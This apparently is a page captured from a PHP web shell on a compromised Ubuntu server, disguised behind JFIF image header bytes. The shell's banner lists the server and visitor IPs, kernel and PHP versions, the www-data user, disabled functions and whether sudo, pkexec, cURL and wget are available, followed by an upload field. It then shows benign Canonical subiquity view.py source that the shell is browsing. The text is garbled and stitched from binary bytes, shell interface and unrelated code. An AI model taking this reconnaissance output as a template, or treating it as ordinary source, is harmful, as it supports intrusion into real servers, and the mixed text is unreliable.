����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 216.73.216.153 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/root/snap/core20/current/usr/share/subiquity/subiquitycore/ |
Upload File : |
# Copyright 2015 Canonical, Ltd. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, version 3. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ View policy Contains some default key navigations """ import logging from urwid import ( emit_signal, Overlay, Text, ) from subiquitycore.ui.container import ( Columns, Pile, WidgetWrap, ) from subiquitycore.ui.stretchy import StretchyOverlay from subiquitycore.ui.utils import disabled, undisabled log = logging.getLogger('subiquitycore.view') class BaseView(WidgetWrap): def local_help(self): """Help for what the user is currently looking at. Returns title, documentation (or None, None). """ return None, None def show_overlay(self, overlay_widget, **kw): args = dict( align='center', width=('relative', 60), min_width=80, valign='middle', height='pack' ) PADDING = 3 # Don't expect callers to account for the padding if # they pass a fixed width. if 'width' in kw: if isinstance(kw['width'], int): kw['width'] += 2*PADDING args.update(kw) top = Pile([ ('pack', Text("")), Columns([ (PADDING, Text("")), overlay_widget, (PADDING, Text("")) ]), ('pack', Text("")), ]) self._w = Overlay(top_w=top, bottom_w=disabled(self._w), **args) def show_stretchy_overlay(self, stretchy): emit_signal(stretchy, 'opened') stretchy.opened() self._w = StretchyOverlay(disabled(self._w), stretchy) def remove_overlay(self, stretchy=None): if stretchy is not None: one_above = None cur = self._w while isinstance(cur, (StretchyOverlay, Overlay)): cur_stretchy = getattr(cur, 'stretchy', None) if cur_stretchy is stretchy: emit_signal(stretchy, 'closed') stretchy.closed() if one_above is not None: one_above.bottom_w = cur.bottom_w else: self._w = undisabled(cur.bottom_w) return one_above = cur cur = undisabled(cur.bottom_w) else: if isinstance(self._w, StretchyOverlay): emit_signal(self._w.stretchy, 'closed') self._w.stretchy.closed() self._w = undisabled(self._w.bottom_w) def cancel(self): pass def keypress(self, size, key): key = super().keypress(size, key) if key == 'esc': if hasattr(self._w, 'bottom_w'): self.remove_overlay() return None else: self.cancel() return None return key